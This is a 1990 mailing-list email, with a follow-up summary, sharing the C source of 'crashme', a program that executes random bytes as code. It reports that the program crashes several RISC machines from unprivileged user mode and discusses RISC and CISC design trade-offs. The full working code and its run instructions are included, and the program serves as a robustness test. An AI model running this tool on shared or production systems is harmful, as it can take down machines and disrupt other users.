Crash a RISC machine from user-mode code:

Thu Aug 9 09:09:00 AEST 1990

This is what I got through EMAIL:(Very intresting)

From:
DECWRL::"zaphod.mps.ohio-state.edu!usc!samsung!mitech!gjc at tut.cis.ohio-s
state.edu" "MAIL-11 Daemon" 31-JUL-1990 00:03:39.91
To:	info-vax at kl.sri.com 
CC:	
Subj:	how to crash a RISC machine from user-mode code: !!! 

I am posting this to info-vax because lots of people on this list
would have SUN-4's or other RISC machines to try it on, and we VAX
users could use a good chuckle from time to time.

The motivation here: As I was reading about the SPARC architecture I
thought, gee, it must be quite a pain to do the analysis of all the
billions of different machine-state combinations one could get executing
a sequence of a few random instructions. And I *do* mean random. Not
well behaved stuff like compilers are supposed to generate, but really
random data executed as code. Buggy programs are jumping off into data
space all the time.

Extract this as crashme.c, cc -o crashme crashme.c and then try this:
%crashme 1000 10 200

On the few SUN-4's I've tried: this allows a user-mode program to
crash the system. Is it a hardware bug (hard to fix) or just a
software bug? I don't know. Report back your findings to me
and I will summarize. (Try it with different argument combinations).

/* crashme: Create a string of random bytes and then jump to it.
            crashme <nbytes> <srand> <ntrys>

THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS, IN NO EVENT SHALL
HE BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS,
WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION,
ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS
SOFTWARE.

A signal handler is set up so that in most cases the machine exception
generated by the illegal instructions, bad operands, etc in the procedure
made up of random data are caught; and another round of randomness may
be tried. Eventually the a random instruction may corrupt the program or
the machine state in such a way that the program must halt.

Note: This program has never caused any problem on a VAX, or other CISC
      architecture with a protected-mode operating system, but on certain
      RISC machines it has been observed to allow a user-mode program to
      crash the machine.

*/

#include <stdio.h>
#include <signal.h>
#include <setjmp.h>

long nbytes,nseed,ntrys;
unsigned char *the_data;

jmp_buf again_buff;

void (*badboy)();

void again_handler(sig, code, scp, addr)
     int sig, code;
     struct sigcontext *scp;
     char *addr;
{char *ss;
 switch(sig)
   {case SIGILL: ss =   " illegal instruction"; break;
    case SIGTRAP: ss =   " trace trap"; break;
    case SIGFPE: ss =   " arithmetic exception"; break;
    case SIGBUS: ss =  " bus error"; break;
    case SIGSEGV: ss =  " segmentation violation"; break;
   default: ss = "";}
 fprintf(stderr,"Got signal %d%s\n",sig,ss);
 longjmp(again_buff,3);}

set_up_signals()
{signal(SIGILL,again_handler);
 signal(SIGTRAP,again_handler);
 signal(SIGFPE,again_handler);
 signal(SIGBUS,again_handler);
 signal(SIGSEGV,again_handler);}

compute_badboy()
{long j,n;
 n = (nbytes < 0) ? - nbytes : nbytes;
 for(j=0;j<n;++j) the_data[j] = (rand() >> 7) & 0xFF;
 if (nbytes < 0)
   {fprintf(stdout,"Dump of %ld bytes of data\n",n);
    for(j=0;j<n;++j)
      {fprintf(stdout,"%3d",the_data[j]);
       if ((j % 20) == 19) putc('\n',stdout); else putc(' ',stdout);}
    putc('\n',stdout);}}

try_one_crash()
{compute_badboy();
 if (nbytes >= 0) 
   (*badboy)();}

main(argc,argv)
 int argc; char **argv;
{long i;
 if (argc != 4) {fprintf(stderr,"crashme <nbytes> <srand> <ntrys>\n");
		 exit(1);}
 nbytes = atol(argv[1]);
 nseed = atol(argv[2]);
 ntrys = atol(argv[3]);
 fprintf(stdout,"crashem %ld %ld %ld\n",nbytes,nseed,ntrys);
 fflush(stdout);
 the_data = (unsigned char *) malloc((nbytes < 0) ? -nbytes : nbytes);
 badboy = (void (*)()) the_data;
 fprintf(stdout,"Badboy at %d. 0x%X\n",badboy,badboy);
 srand(nseed);
 for(i=0;i<ntrys;++i)
   {fprintf(stderr,"%ld\n",i);
    if(setjmp(again_buff) == 3)
      fprintf(stderr,"Barfed\n");
    else
      {set_up_signals();
       try_one_crash();
       fprintf(stderr,"didn't barf!\n");}}}

-----end of crashme.c----------  
% ====== Internet headers and postmarks (see DECWRL::GATEWAY.DOC) ======
From:	DECWRL::"usc!samsung!mitech!gjc at ucsd.edu" "MAIL-11 Daemon"  2-AUG-1990
03:25:34.83
To:	info-vax at kl.sri.com 
CC:	
Subj:	SUMMARY: How to Crash a RISC, or Revenge of the VAX? 

OK. Here is a quick summary of the HOW TO CRASH A RISC machine from
a USER-MODE program test. Reports have arrived that all of these machines
can be crashed using CRASHME.C:
IBM RT, MIPS, DECSTATION 5000, SPARC.

On the two CISC architectures tried, VAX/VMS and SUN-3, the program
either completed or exited with a core or register dump, as expected.

Some background/motivation. My experience with microcode programming
taught me that some sequences of MICROINSTRUCTIONS could wedge or jam
the hardware in such a way that recovery was impossible without
a reboot of some kind. The RISC architectures have some of the same
properties of MICROCODE in that certain instruction sequences have
UNDEFINED behavior. Now one of the great costs in a CISC machine is
usually the trouble the designers go through to make sure that
every instruction returns the MACHINE to a KNOWN STATE. That way
the behavior of every instruction can be well defined, tested, and
documented, individually verified and tested, and by simple induction
be valid for arbitrary SEQUENCES of instructions. (In general).

Engineers of RISC machines don't bother to do this, which is one of
the reasons they are CHEAPER (the hardware, not the engineers).

The problem of proving that an arbitary sequence of instructions "N"
long will not crash the machine is much more costly if N > 1.
(To say the least, if you know anything about mathematical logic).
If there are M instructions (and M is probably around 1 BILLION)
then there may be about M^N cases to check. And what is N? 
For a classic CISC machine a price is paid to make N = 1, or
at least small. But for a RISC machine, might N be 10 or more?

Anyway, no need to make too big a deal about this. Probably all the
vendors can fix things in software alone, and certainly CISC chips
with bugs in them have been shipped in the past too.

Just a reminder though. There is no free lunch. There really is
a trade-off between ROBUSTNESS-PRICE/PERFORMANCE-TIME_TO_MARKET.

-gjc
% ====== Internet headers and postmarks (see DECWRL::GATEWAY.DOC) ======